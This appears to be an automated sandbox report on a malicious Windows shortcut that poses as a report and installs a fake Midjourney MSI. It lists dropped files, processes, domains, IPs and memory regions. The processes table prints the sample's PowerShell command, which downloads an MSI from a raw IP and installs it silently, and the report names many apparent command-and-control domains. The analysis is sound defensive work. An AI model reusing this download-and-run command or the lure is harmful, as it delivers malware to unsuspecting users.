Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Report-41952.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Working directory, Has
command line arguments, Icon number=0, Archive, ctime=Thu Jul 26 00:26:44 2012, mtime=Thu Jul 26 00:26:44 2012, atime=Thu
Jul 26 02:20:50 2012, length=454656, window=hide
|
initial sample
|
 |
|
|
C:\ProgramData\BDncqpUxZl.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\y.msi
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252,
Revision Number: {9D88B303-3E62-4D29-9D8E-507E3918FF97}, Number of Words: 10, Subject: Midjourney, Author: Midjourney Inc.,
Name of Creating Application: Midjourney, Template: ;1033, Comments: This installer database contains the logic and data required
to install Midjourney., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Wed Oct 2 17:46:18
2024, Last Saved Time/Date: Wed Oct 2 17:46:18 2024, Last Printed: Wed Oct 2 17:46:18 2024, Number of Pages: 450
|
dropped
|
|
|
|
C:\Windows\Installer\MSI40C1.tmp
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Windows\Installer\MSI416E.tmp
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Windows\Installer\MSI419D.tmp
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Windows\Installer\MSI41BE.tmp
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Windows\Installer\MSI420D.tmp
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Config.Msi\423fe8.rbs
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c0t2fnkw.044.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i3uazcf3.roa.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Installer\{E29C2A9E-997E-49AB-92C0-59583123ED29}\s1.exe
|
MS Windows icon resource - 1 icon, -113x123, 24 bits/pixel
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\2867298e7ac6986e.customDesusertions-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\9GZ6BKPPOHCLQ7QO684Y.temp
|
data
|
dropped
|
||
|
C:\Windows\Installer\423fe6.msi
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252,
Revision Number: {9D88B303-3E62-4D29-9D8E-507E3918FF97}, Number of Words: 10, Subject: Midjourney, Author: Midjourney Inc.,
Name of Creating Application: Midjourney, Template: ;1033, Comments: This installer database contains the logic and data required
to install Midjourney., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Wed Oct 2 17:46:18
2024, Last Saved Time/Date: Wed Oct 2 17:46:18 2024, Last Printed: Wed Oct 2 17:46:18 2024, Number of Pages: 450
|
dropped
|
||
|
C:\Windows\Installer\MSI42AA.tmp
|
data
|
dropped
|
||
|
C:\Windows\Installer\SourceHash{E29C2A9E-997E-49AB-92C0-59583123ED29}
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Installer\inprogressinstallinfo.ipi
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
|
C:\Windows\Temp\~DF33B0B6D087935130.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DF46983FC733841CC0.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DF635CF01D71DA2922.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DF87340E2A334AC6E5.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
There are 14 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest "http://193.242.145.138/mid/w1/Midjourney.msi"
-OutFile "C:\Users\user\AppData\Roaming\y.msi";msiexec /i C:\Users\user\AppData\Roaming\y.msi /qn
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\msiexec.exe
|
"C:\Windows\system32\msiexec.exe" /i C:\Users\user\AppData\Roaming\y.msi /qn
|
||
|
C:\Windows\System32\msiexec.exe
|
C:\Windows\system32\msiexec.exe /V
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\syswow64\MsiExec.exe -Embedding 800D0887C271C3914D75F510FDC66322
|
||
|
C:\Windows\System32\msiexec.exe
|
"C:\Windows\System32\MsiExec.exe" /Y "C:\ProgramData\BDncqpUxZl.dll"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://193.242.145.138
|
unknown
|
|
|
|
http://193.242.145.138/mid/w1/Midjourney.msi
|
193.242.145.138
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://193.242.145.138/mid/w1/midjourney.msi
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://193.242.145.138/mid/w1/Midjourney.msi-OutFileC:
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 5 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
8hjv8mbhrlj.life
|
unknown
|
|
|
|
dxyob8x456a.life
|
unknown
|
|
|
|
8qvt5iabz5n.life
|
unknown
|
|
|
|
4izk0gc9is6.life
|
unknown
|
|
|
|
xeoz1f1vjs0.life
|
unknown
|
|
|
|
y0zvqpi42no.life
|
unknown
|
|
|
|
z3z4fq0420z.life
|
unknown
|
|
|
|
nzs8vi9w5o8.life
|
unknown
|
|
|
|
vu5b47m18jn.life
|
unknown
|
|
|
|
6brdh3p893b.life
|
unknown
|
|
|
|
in4pzu7t2pv.life
|
unknown
|
|
|
|
fig3gj0v6qe.life
|
unknown
|
|
|
|
93j4v4jopzd.life
|
unknown
|
|
|
|
8mgj12azbyd.life
|
unknown
|
|
|
|
bev8ymaajb7.life
|
unknown
|
|
|
|
y9neib92f2m.life
|
unknown
|
|
|
|
mjb3r6mcs1f.life
|
unknown
|
|
|
|
38i6lh0rpze.life
|
unknown
|
|
|
|
lrugnff8fkc.life
|
unknown
|
|
|
|
ar7xakeve0o.life
|
unknown
|
|
|
|
8z9m8hndrhp.life
|
unknown
|
|
|
|
08mkuqnx6gv.life
|
unknown
|
|
|
|
ilofx941igp.life
|
unknown
|
|
|
|
4k59ij2ujeu.life
|
unknown
|
|
|
|
o4m5a5no7e8.life
|
unknown
|
|
|
|
8x2apo5m7ri.life
|
unknown
|
|
|
|
m5iukps17y7.life
|
unknown
|
|
|
|
qc4mwjiop45.life
|
unknown
|
|
|
|
lobavyclh8e.life
|
unknown
|
|
|
|
2z1ls31az7s.life
|
unknown
|
|
|
|
7ewh8ltr7il.life
|
unknown
|
|
|
|
1grovn87c8s.life
|
unknown
|
|
|
|
eb4l6wisq9z.life
|
unknown
|
|
|
|
wdga570b8pz.life
|
unknown
|
|
|
|
0tab35o0swu.life
|
unknown
|
|
|
|
vauy5ah65sx.life
|
unknown
|
|
|
|
p5047yjrb8q.life
|
unknown
|
|
|
|
b1h0uaabzyz.life
|
unknown
|
|
|
|
65r8nx12fqr.life
|
unknown
|
|
|
|
zdf5ki8x9r0.life
|
unknown
|
|
|
|
x9yrzer0ndt.life
|
unknown
|
|
|
|
bzc9sq2pz53.life
|
unknown
|
|
|
|
khxcp22s3dz.life
|
unknown
|
|
|
|
he8fq4k8d3w.life
|
unknown
|
|
|
|
vl41cymzzfq.life
|
unknown
|
|
|
|
dw34kmgfl7t.life
|
unknown
|
|
|
|
exueqqmz3ia.life
|
unknown
|
|
|
|
9do3mcejztt.life
|
unknown
|
|
|
|
d0xtxp89bb9.life
|
unknown
|
|
|
|
l9t6r0y6cvi.life
|
unknown
|
|
|
|
6mnudp7zj73.life
|
unknown
|
|
|
|
dpgs2lt1sbz.life
|
unknown
|
|
|
|
du19ek78tjw.life
|
unknown
|
|
|
|
8ru044xed25.life
|
unknown
|
|
|
|
nyy41uibsv5.life
|
unknown
|
|
|
|
2u8znzsbrto.life
|
unknown
|
|
|
|
7r8ln1wswth.life
|
unknown
|
|
|
|
j280b59doxz.life
|
unknown
|
|
|
|
7exy2b231n2.life
|
unknown
|
|
|
|
37z6li6l9y2.life
|
unknown
|
|
|
|
f4vb9n3tdvh.life
|
unknown
|
|
|
|
plll0xq4y82.life
|
unknown
|
|
|
|
hudrx8fn980.life
|
unknown
|
|
|
|
widn8soih8u.life
|
unknown
|
|
|
|
glux8x5b8d6.life
|
unknown
|
|
|
|
drmk5rdefb5.life
|
unknown
|
|
|
|
1v0xhie4os8.life
|
unknown
|
|
|
|
6q894zusd4k.life
|
unknown
|
|
|
|
mk7plk9c6i2.life
|
unknown
|
|
|
|
ru4jvijdytq.life
|
unknown
|
|
|
|
tvx1ovdepj8.life
|
unknown
|
|
|
|
331k2rdkmmb.life
|
unknown
|
|
|
|
234ct3lkozp.life
|
unknown
|
|
|
|
w8ligr695sd.life
|
unknown
|
|
|
|
acgr6r8zdot.life
|
unknown
|
|
|
|
txgogs9p8a1.life
|
unknown
|
|
|
|
f2j20ayqh8y.life
|
unknown
|
|
|
|
pxu1ajsdhqr.life
|
unknown
|
|
|
|
lzeqr3apopn.life
|
unknown
|
|
|
|
eeqwg3mzq07.life
|
unknown
|
|
|
|
l6syolvczan.life
|
unknown
|
|
|
|
3e6rrifr5fn.life
|
unknown
|
|
|
|
y7pzxau0717.life
|
unknown
|
|
|
|
9f6p9g7x13s.life
|
unknown
|
|
|
|
ge0lpqif3ar.life
|
unknown
|
|
|
|
xo8be64ejh2.life
|
unknown
|
|
|
|
9qiliikd3sp.life
|
45.155.37.103
|
||
|
ygo9u1fkwux.life
|
37.27.203.12
|
||
|
q7dfpyyhe08.life
|
213.109.192.75
|
||
|
yan95akxgqt.life
|
38.180.143.64
|
||
|
07zxfo0kere.life
|
38.180.86.21
|
||
|
uyn0icgx1kv.life
|
38.180.144.181
|
||
|
ameagxzo2f7.life
|
185.26.238.223
|
||
|
736d0mvetjw.life
|
65.108.214.195
|
||
|
38f5wvwwn7o.life
|
185.93.221.123
|
||
|
fsr2hskx44p.life
|
185.81.114.195
|
||
|
nhdeapyfg7e.life
|
84.32.84.32
|
||
|
0cc2z8zrnhf.life
|
95.156.207.204
|
||
|
ibcm5at6qrz.life
|
144.208.127.113
|
||
|
spd22scperm.life
|
185.36.140.112
|
There are 90 hidden domains, click here to show them.
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
193.242.145.138
|
unknown
|
unknown
|
|
|
|
185.93.221.123
|
38f5wvwwn7o.life
|
Switzerland
|
||
|
185.81.114.195
|
fsr2hskx44p.life
|
United Kingdom
|
||
|
45.155.37.103
|
9qiliikd3sp.life
|
Netherlands
|
||
|
65.108.214.195
|
736d0mvetjw.life
|
United States
|
||
|
84.32.84.32
|
nhdeapyfg7e.life
|
Lithuania
|
||
|
185.36.140.112
|
spd22scperm.life
|
European Union
|
||
|
213.109.192.75
|
q7dfpyyhe08.life
|
unknown
|
||
|
185.26.238.223
|
ameagxzo2f7.life
|
European Union
|
||
|
38.180.86.21
|
07zxfo0kere.life
|
United States
|
||
|
38.180.143.64
|
yan95akxgqt.life
|
United States
|
||
|
21.105.15.36
|
unknown
|
United States
|
||
|
192.168.0.101
|
unknown
|
unknown
|
||
|
95.156.207.204
|
0cc2z8zrnhf.life
|
Spain
|
||
|
38.180.144.181
|
uyn0icgx1kv.life
|
United States
|
||
|
37.27.203.12
|
ygo9u1fkwux.life
|
Iran (ISLAMIC Republic Of)
|
||
|
144.208.127.113
|
ibcm5at6qrz.life
|
United States
|
||
|
127.0.0.1
|
unknown
|
unknown
|
There are 8 hidden IPs, click here to show them.
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
Owner
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
SessionHash
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
Sequence
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
|
C:\Config.Msi\
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
|
C:\Config.Msi\423fe8.rbs
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
|
C:\Config.Msi\423fe8.rbsLow
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
|
C:\Users\user\AppData\Roaming\Microsoft\Installer\
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Components\8AD258AA1F14B5241B3BD92233745DF5
|
E9A2C92EE799BA94290C95851332DE92
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Components\56DB09C8061D0724DB5BD8D1A2FB8379
|
E9A2C92EE799BA94290C95851332DE92
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Components\D58E42ECF8CBE704BABE6C9F1692E9D2
|
E9A2C92EE799BA94290C95851332DE92
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
|
C:\Users\user\AppData\Roaming\Midjourney Inc\Midjourney\
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
|
C:\Users\user\AppData\Roaming\Midjourney Inc\
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
|
C:\Users\user\AppData\Roaming\Microsoft\Installer\{E29C2A9E-997E-49AB-92C0-59583123ED29}\
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Midjourney Inc.\Midjourney
|
Version
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Midjourney Inc.\Midjourney
|
Path
|
There are 19 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1B859070000
|
heap
|
page read and write
|
||
|
1B85904F000
|
heap
|
page read and write
|
||
|
1A4B37A000
|
stack
|
page read and write
|
||
|
1B859076000
|
heap
|
page read and write
|
||
|
1DFDF7E000
|
stack
|
page read and write
|
||
|
1EA31F95000
|
heap
|
page read and write
|
||
|
1EA4BE30000
|
heap
|
page read and write
|
||
|
1EA35701000
|
trusted library allocation
|
page read and write
|
||
|
1EA4BE00000
|
heap
|
page execute and read and write
|
||
|
1EA33860000
|
trusted library allocation
|
page read and write
|
||
|
1EA31DEE000
|
heap
|
page read and write
|
||
|
1EA4C010000
|
heap
|
page read and write
|
||
|
1EA3554C000
|
trusted library allocation
|
page read and write
|
||
|
1B85905D000
|
heap
|
page read and write
|
||
|
1B859063000
|
heap
|
page read and write
|
||
|
1B859048000
|
heap
|
page read and write
|
||
|
1B859042000
|
heap
|
page read and write
|
||
|
1EA35709000
|
trusted library allocation
|
page read and write
|
||
|
7FF8881A0000
|
trusted library allocation
|
page read and write
|
||
|
1EA353C2000
|
trusted library allocation
|
page read and write
|
||
|
1A4B57C000
|
stack
|
page read and write
|
||
|
7FF888260000
|
trusted library allocation
|
page read and write
|
||
|
1EA33BF0000
|
heap
|
page readonly
|
||
|
1B85902E000
|
heap
|
page read and write
|
||
|
7DF42EE30000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF887F12000
|
trusted library allocation
|
page read and write
|
||
|
1A4B3FE000
|
stack
|
page read and write
|
||
|
1EA31D8A000
|
heap
|
page read and write
|
||
|
1EA43DE1000
|
trusted library allocation
|
page read and write
|
||
|
1B85904E000
|
heap
|
page read and write
|
||
|
1EA33880000
|
heap
|
page read and write
|
||
|
1EA33D90000
|
trusted library allocation
|
page read and write
|
||
|
1B85907E000
|
heap
|
page read and write
|
||
|
1DFDEFE000
|
stack
|
page read and write
|
||
|
1B859088000
|
heap
|
page read and write
|
||
|
1B85904B000
|
heap
|
page read and write
|
||
|
1EA4C151000
|
heap
|
page read and write
|
||
|
1B85907C000
|
heap
|
page read and write
|
||
|
7FF8880D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EA35930000
|
trusted library allocation
|
page read and write
|
||
|
1EA4BE54000
|
heap
|
page read and write
|
||
|
1B859076000
|
heap
|
page read and write
|
||
|
7FF888170000
|
trusted library allocation
|
page read and write
|
||
|
1B85907E000
|
heap
|
page read and write
|
||
|
1B859074000
|
heap
|
page read and write
|
||
|
1EA4BF02000
|
heap
|
page read and write
|
||
|
7FF887FCC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A4B1FA000
|
stack
|
page read and write
|
||
|
7FF8881E0000
|
trusted library allocation
|
page read and write
|
||
|
1B859052000
|
heap
|
page read and write
|
||
|
1EA33C33000
|
trusted library allocation
|
page read and write
|
||
|
1EA3566E000
|
trusted library allocation
|
page read and write
|
||
|
1A4C20D000
|
stack
|
page read and write
|
||
|
1EA353BA000
|
trusted library allocation
|
page read and write
|
||
|
1DFDE7B000
|
stack
|
page read and write
|
||
|
7FF888180000
|
trusted library allocation
|
page read and write
|
||
|
1EA31D22000
|
heap
|
page read and write
|
||
|
7FF8880B0000
|
trusted library allocation
|
page read and write
|
||
|
1EA33E6A000
|
trusted library allocation
|
page read and write
|
||
|
1B859060000
|
heap
|
page read and write
|
||
|
1B85905D000
|
heap
|
page read and write
|
||
|
1EA31DF0000
|
heap
|
page read and write
|
||
|
1B85907E000
|
heap
|
page read and write
|
||
|
1B859048000
|
heap
|
page read and write
|
||
|
1EA31D87000
|
heap
|
page read and write
|
||
|
1B859052000
|
heap
|
page read and write
|
||
|
1B859061000
|
heap
|
page read and write
|
||
|
7FF887F2B000
|
trusted library allocation
|
page read and write
|
||
|
1EA3565A000
|
trusted library allocation
|
page read and write
|
||
|
1B859077000
|
heap
|
page read and write
|
||
|
1EA4BF2C000
|
heap
|
page read and write
|
||
|
1A4C04E000
|
stack
|
page read and write
|
||
|
1EA31F90000
|
heap
|
page read and write
|
||
|
1A4B277000
|
stack
|
page read and write
|
||
|
1EA33C77000
|
heap
|
page read and write
|
||
|
1EA33D80000
|
heap
|
page execute and read and write
|
||
|
1B859044000
|
heap
|
page read and write
|
||
|
1DFDFFE000
|
stack
|
page read and write
|
||
|
1A4BFCF000
|
stack
|
page read and write
|
||
|
1DFDAB9000
|
stack
|
page read and write
|
||
|
1B859055000
|
heap
|
page read and write
|
||
|
7FF887F20000
|
trusted library allocation
|
page read and write
|
||
|
1EA31DC6000
|
heap
|
page read and write
|
||
|
7FF888120000
|
trusted library allocation
|
page read and write
|
||
|
1A4B0FF000
|
stack
|
page read and write
|
||
|
7FF888220000
|
trusted library allocation
|
page read and write
|
||
|
1B859055000
|
heap
|
page read and write
|
||
|
1EA359F6000
|
trusted library allocation
|
page read and write
|
||
|
1B85907E000
|
heap
|
page read and write
|
||
|
1B85904F000
|
heap
|
page read and write
|
||
|
1A4B17D000
|
stack
|
page read and write
|
||
|
7FF8880CA000
|
trusted library allocation
|
page read and write
|
||
|
1B859037000
|
heap
|
page read and write
|
||
|
1EA31FD0000
|
heap
|
page read and write
|
||
|
1EA3562C000
|
trusted library allocation
|
page read and write
|
||
|
1B859000000
|
heap
|
page read and write
|
||
|
7FF888200000
|
trusted library allocation
|
page read and write
|
||
|
1EA33BE0000
|
trusted library allocation
|
page read and write
|
||
|
1EA4BE5B000
|
heap
|
page read and write
|
||
|
7FF887FC6000
|
trusted library allocation
|
page read and write
|
||
|
7FF887FD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EA31CB0000
|
heap
|
page read and write
|
||
|
1EA33C30000
|
trusted library allocation
|
page read and write
|
||
|
1A4B07E000
|
stack
|
page read and write
|
||
|
1EA31CD0000
|
heap
|
page read and write
|
||
|
1EA4C169000
|
heap
|
page read and write
|
||
|
7FF888160000
|
trusted library allocation
|
page read and write
|
||
|
1EA31DB4000
|
heap
|
page read and write
|
||
|
7FF8880F2000
|
trusted library allocation
|
page read and write
|
||
|
1EA31CA0000
|
heap
|
page read and write
|
||
|
1B85902E000
|
heap
|
page read and write
|
||
|
7FF887F13000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A4C18F000
|
stack
|
page read and write
|
||
|
1A4AB05000
|
stack
|
page read and write
|
||
|
1A4B2F9000
|
stack
|
page read and write
|
||
|
1B858FA0000
|
heap
|
page read and write
|
||
|
1EA31EE0000
|
heap
|
page read and write
|
||
|
1A4AEFD000
|
stack
|
page read and write
|
||
|
1EA33DE1000
|
trusted library allocation
|
page read and write
|
||
|
1EA43DF0000
|
trusted library allocation
|
page read and write
|
||
|
1EA31DA6000
|
heap
|
page read and write
|
||
|
1B859059000
|
heap
|
page read and write
|
||
|
7FF887FC0000
|
trusted library allocation
|
page read and write
|
||
|
1A4C0CD000
|
stack
|
page read and write
|
||
|
7FF8881F0000
|
trusted library allocation
|
page read and write
|
||
|
1B858F60000
|
heap
|
page readonly
|
||
|
1EA35707000
|
trusted library allocation
|
page read and write
|
||
|
1A4B4FE000
|
stack
|
page read and write
|
||
|
1B859044000
|
heap
|
page read and write
|
||
|
1EA31D47000
|
heap
|
page read and write
|
||
|
7FF888210000
|
trusted library allocation
|
page read and write
|
||
|
1EA43E5E000
|
trusted library allocation
|
page read and write
|
||
|
7FF888240000
|
trusted library allocation
|
page read and write
|
||
|
1EA4C100000
|
heap
|
page read and write
|
||
|
7FF887F14000
|
trusted library allocation
|
page read and write
|
||
|
1B859083000
|
heap
|
page read and write
|
||
|
7FF8881B0000
|
trusted library allocation
|
page read and write
|
||
|
1A4ABCE000
|
stack
|
page read and write
|
||
|
1EA31DB0000
|
heap
|
page read and write
|
||
|
1EA4BE20000
|
heap
|
page execute and read and write
|
||
|
1EA355E7000
|
trusted library allocation
|
page read and write
|
||
|
1B859067000
|
heap
|
page read and write
|
||
|
1EA35124000
|
trusted library allocation
|
page read and write
|
||
|
7FF888230000
|
trusted library allocation
|
page read and write
|
||
|
7FF888100000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EA4BF0F000
|
heap
|
page read and write
|
||
|
1B859295000
|
heap
|
page read and write
|
||
|
7FF888110000
|
trusted library allocation
|
page read and write
|
||
|
1B859210000
|
heap
|
page read and write
|
||
|
7FF8881C0000
|
trusted library allocation
|
page read and write
|
||
|
1EA34A11000
|
trusted library allocation
|
page read and write
|
||
|
1B859061000
|
heap
|
page read and write
|
||
|
1B85904B000
|
heap
|
page read and write
|
||
|
7FF888270000
|
trusted library allocation
|
page read and write
|
||
|
1B859042000
|
heap
|
page read and write
|
||
|
1EA4C165000
|
heap
|
page read and write
|
||
|
1EA34011000
|
trusted library allocation
|
page read and write
|
||
|
7FF8880C1000
|
trusted library allocation
|
page read and write
|
||
|
1B859039000
|
heap
|
page read and write
|
||
|
1B85900B000
|
heap
|
page read and write
|
||
|
1B859060000
|
heap
|
page read and write
|
||
|
1EA31DF4000
|
heap
|
page read and write
|
||
|
1B859056000
|
heap
|
page read and write
|
||
|
1A4AE7E000
|
stack
|
page read and write
|
||
|
1B85906B000
|
heap
|
page read and write
|
||
|
1B859290000
|
heap
|
page read and write
|
||
|
1B858F70000
|
heap
|
page read and write
|
||
|
1EA4BE27000
|
heap
|
page execute and read and write
|
||
|
7FF888030000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B85906F000
|
heap
|
page read and write
|
||
|
7FF888190000
|
trusted library allocation
|
page read and write
|
||
|
1EA43F95000
|
trusted library allocation
|
page read and write
|
||
|
7FF8880E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B859043000
|
heap
|
page read and write
|
||
|
1EA33DD0000
|
heap
|
page read and write
|
||
|
7FF8881D0000
|
trusted library allocation
|
page read and write
|
||
|
1B859063000
|
heap
|
page read and write
|
||
|
1B859048000
|
heap
|
page read and write
|
||
|
1EA43E52000
|
trusted library allocation
|
page read and write
|
||
|
7FF888250000
|
trusted library allocation
|
page read and write
|
||
|
1B859074000
|
heap
|
page read and write
|
||
|
1B85906B000
|
heap
|
page read and write
|
||
|
7FF887FF6000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A4AFFB000
|
stack
|
page read and write
|
||
|
1B859047000
|
heap
|
page read and write
|
||
|
7FF888130000
|
trusted library allocation
|
page read and write
|
||
|
1B85905D000
|
heap
|
page read and write
|
||
|
1EA4BEA5000
|
heap
|
page read and write
|
||
|
1EA359FA000
|
trusted library allocation
|
page read and write
|
||
|
7FF887F1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A4C28E000
|
stack
|
page read and write
|
||
|
1EA355D3000
|
trusted library allocation
|
page read and write
|
||
|
1EA35405000
|
trusted library allocation
|
page read and write
|
||
|
1EA31FD5000
|
heap
|
page read and write
|
||
|
1A4AB8E000
|
stack
|
page read and write
|
||
|
1EA31D10000
|
heap
|
page read and write
|
||
|
1EA4BEA1000
|
heap
|
page read and write
|
||
|
1A4AF7E000
|
stack
|
page read and write
|
||
|
7FF888140000
|
trusted library allocation
|
page read and write
|
||
|
1B858F50000
|
heap
|
page read and write
|
||
|
1EA4BF26000
|
heap
|
page read and write
|
||
|
1A4B47E000
|
stack
|
page read and write
|
||
|
7FF888150000
|
trusted library allocation
|
page read and write
|
||
|
1EA353B4000
|
trusted library allocation
|
page read and write
|
||
|
1A4C10F000
|
stack
|
page read and write
|
||
|
1B85904E000
|
heap
|
page read and write
|
||
|
1A4B5FB000
|
stack
|
page read and write
|
||
|
1B859067000
|
heap
|
page read and write
|
There are 198 hidden memdumps, click here to show them.